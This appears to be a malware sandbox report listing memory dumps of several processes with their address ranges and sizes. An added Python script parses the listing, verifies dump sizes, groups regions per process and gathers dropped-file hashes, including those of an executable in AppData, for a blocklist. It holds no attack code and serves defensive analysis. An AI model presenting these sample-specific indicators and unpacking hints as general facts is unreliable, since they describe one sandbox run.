  SHA512 5d91fe6507e01cdbd0e5edf244c086cb9dee5e46296bf7128e63a1f8f0e6d87c9aa02d770cbe1e2d247078b44275d7f055c94f43d37a61a43d045efdaf4e6569

• memory/644-243-0x0000000010000000-0x000000001001C000-memory.dmp
  Filesize 112KB

• memory/644-236-0x0000000000400000-0x000000000042F000-memory.dmp
  Filesize 188KB

• memory/644-238-0x0000000000400000-0x000000000042F000-memory.dmp
  Filesize 188KB

• memory/680-234-0x00000000001F0000-0x0000000000BDD000-memory.dmp
  Filesize 9.9MB

• memory/680-191-0x00000000001F0000-0x0000000000BDD000-memory.dmp
  Filesize 9.9MB

• memory/680-235-0x00000000001F0000-0x0000000000BDD000-memory.dmp
  Filesize 9.9MB

• memory/680-239-0x00000000001F0000-0x0000000000BDD000-memory.dmp
  Filesize 9.9MB

                      • memory/876-169-0x0000000006550000-0x0000000006A19000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/876-171-0x0000000006550000-0x0000000006A19000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/988-405-0x0000000000960000-0x0000000000DF6000-memory.dmp

                        Filesize

                        4.6MB

                      • memory/1144-464-0x0000000000A90000-0x0000000000D9D000-memory.dmp

                        Filesize

                        3.1MB

                      • memory/1612-287-0x0000000000400000-0x000000000042F000-memory.dmp

                        Filesize

                        188KB

                      • memory/1880-81-0x0000000000390000-0x0000000000859000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/1880-83-0x0000000000390000-0x0000000000859000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/1960-158-0x0000000000150000-0x0000000000178000-memory.dmp

                        Filesize

                        160KB

                      • memory/2096-9-0x00000000064F0000-0x00000000069B9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-435-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-159-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-232-0x0000000006960000-0x000000000734D000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/2148-420-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-465-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-188-0x0000000006960000-0x000000000734D000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/2148-189-0x0000000006960000-0x000000000734D000-memory.dmp

                        Filesize

                        9.9MB

                      • memory/2148-262-0x0000000006960000-0x00000000075A5000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/2148-265-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-660-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-30-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-283-0x0000000006960000-0x00000000075A5000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/2148-39-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-233-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-173-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-288-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-489-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2148-44-0x00000000011E0000-0x00000000016A9000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2168-286-0x0000000000150000-0x0000000000D95000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/2168-282-0x0000000000150000-0x0000000000D95000-memory.dmp

                        Filesize

                        12.3MB

                      • memory/2284-654-0x0000000001050000-0x00000000014BC000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/2284-653-0x0000000001050000-0x00000000014BC000-memory.dmp

                        Filesize

                        4.4MB

                      • memory/2360-478-0x0000000000390000-0x0000000000A2B000-memory.dmp

                        Filesize

                        6.6MB

                      • memory/2396-419-0x0000000000920000-0x0000000000C23000-memory.dmp

                        Filesize

                        3.0MB

                      • memory/2536-79-0x00000000064A0000-0x0000000006969000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2536-78-0x00000000064A0000-0x0000000006969000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2568-455-0x000000001B460000-0x000000001B742000-memory.dmp

                        Filesize

                        2.9MB

                      • memory/2568-456-0x0000000001D10000-0x0000000001D18000-memory.dmp

                        Filesize

                        32KB

                      • memory/2668-28-0x0000000007460000-0x0000000007929000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2668-27-0x00000000013D0000-0x0000000001899000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2736-814-0x0000000000D10000-0x0000000000D70000-memory.dmp

                        Filesize

                        384KB

                      • memory/2764-205-0x0000000000C80000-0x0000000000CF8000-memory.dmp

                        Filesize

                        480KB

                      • memory/2804-416-0x0000000001390000-0x00000000013A2000-memory.dmp

                        Filesize

                        72KB

                      • memory/2804-417-0x00000000004C0000-0x00000000004D0000-memory.dmp

                        Filesize

                        64KB

                      • memory/2824-137-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-131-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-143-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-140-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-139-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                        Filesize

                        4KB

                      • memory/2824-135-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-133-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-156-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-142-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-127-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2824-129-0x0000000000400000-0x000000000045B000-memory.dmp

                        Filesize

                        364KB

                      • memory/2836-170-0x0000000000ED0000-0x0000000001399000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2836-172-0x0000000000ED0000-0x0000000001399000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/2888-216-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/2888-212-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/2888-214-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/2888-219-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/2888-218-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                        Filesize

                        4KB

                      • memory/2888-210-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/2888-208-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/2888-221-0x0000000000400000-0x0000000000465000-memory.dmp

                        Filesize

                        404KB

                      • memory/3020-124-0x00000000009D0000-0x0000000000A88000-memory.dmp

                        Filesize

                        736KB

                      • memory/3452-709-0x0000000000A20000-0x0000000000AD8000-memory.dmp

                        Filesize

                        736KB

                      • memory/3660-734-0x0000000000800000-0x0000000000828000-memory.dmp

                        Filesize

                        160KB
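The listing above has a fixed shape: a bullet carrying either a dropped-file path or a memory-dump name of the form memory/PID-SEQ-0xSTART-0xEND-memory.dmp, followed by label/value pairs (Filesize, MD5, SHA1, SHA256, SHA512). Repeated address ranges under one PID are separate snapshots of the same region taken at different points in the run, not duplicate entries. As an added example that is not part of the sandbox report or of the tooling that produced it, the Python script below parses that shape, recomputes each memory dump's size from its address range and compares it with the stated Filesize, collapses repeated snapshots into one distinct region per PID, and collects dropped-file hashes for a blocklist. The sample input re-uses values copied from this page's listing; the size-rendering rule (whole KiB below 1 MiB, one-decimal MiB above) is inferred from the listing and is an assumption.

```python
import re
from collections import defaultdict

# Excerpt of the report listing on this page, copied verbatim as sample input.
SAMPLE = r"""
• C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe

  Filesize

  18KB

  MD5

  f3edff85de5fd002692d54a04bcb1c09

  SHA256

  caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131

• memory/644-243-0x0000000010000000-0x000000001001C000-memory.dmp

  Filesize

  112KB

• memory/680-234-0x00000000001F0000-0x0000000000BDD000-memory.dmp

  Filesize

  9.9MB

• memory/680-191-0x00000000001F0000-0x0000000000BDD000-memory.dmp

  Filesize

  9.9MB

• memory/2148-262-0x0000000006960000-0x00000000075A5000-memory.dmp

  Filesize

  12.3MB
"""

LABELS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


def parse_listing(text):
    """Turn the bullet + label/value layout into one dict per listed artifact."""
    records, current, key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            current = {"name": line[1:].strip()}
            records.append(current)
            key = None
        elif line in LABELS:
            key = line
        elif current is not None and key is not None:
            current[key] = line
            key = None
    return records


def format_size(nbytes):
    """Assumed rendering rule: whole KiB under 1 MiB, one-decimal MiB from 1 MiB up."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes // 1024}KB"


def memory_region(name):
    """Decode memory/PID-SEQ-0xSTART-0xEND-memory.dmp; None for dropped files."""
    m = MEM_RE.match(name)
    if not m:
        return None
    pid, seq, start, end = m.groups()
    return int(pid), int(seq), int(start, 16), int(end, 16)


def check_memory_sizes(records):
    """List dumps whose stated Filesize disagrees with the size of the address range."""
    mismatches = []
    for r in records:
        region = memory_region(r["name"])
        if region is None:
            continue
        _, _, start, end = region
        computed = format_size(end - start)
        if r.get("Filesize") != computed:
            mismatches.append((r["name"], r.get("Filesize"), computed))
    return mismatches


def distinct_regions_by_pid(records):
    """Collapse repeated snapshots of one range into a single (start, end) per process."""
    regions = defaultdict(set)
    for r in records:
        region = memory_region(r["name"])
        if region is not None:
            pid, _, start, end = region
            regions[pid].add((start, end))
    return {pid: sorted(v) for pid, v in regions.items()}


def file_hashes(records, algo="SHA256"):
    """Map each dropped-file path to its hash; memory dumps carry no hashes and are skipped."""
    return {r["name"]: r[algo] for r in records
            if algo in r and memory_region(r["name"]) is None}


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    print("size mismatches:", check_memory_sizes(recs))
    for pid, regs in distinct_regions_by_pid(recs).items():
        print(pid, [f"0x{s:X}-0x{e:X}" for s, e in regs])
    print(file_hashes(recs))
```

Run over the full listing, the size check passes for every entry on this page, which confirms the rendering rule above; a mismatch would point at a mis-parsed line rather than at the sandbox. The per-PID view is what you want when deciding which dump to unpack: a region at 0x400000 is the default image base of a 32-bit PE, so a dump there is usually the unpacked or injected payload image, while the larger high-address regions are the loader's own working set.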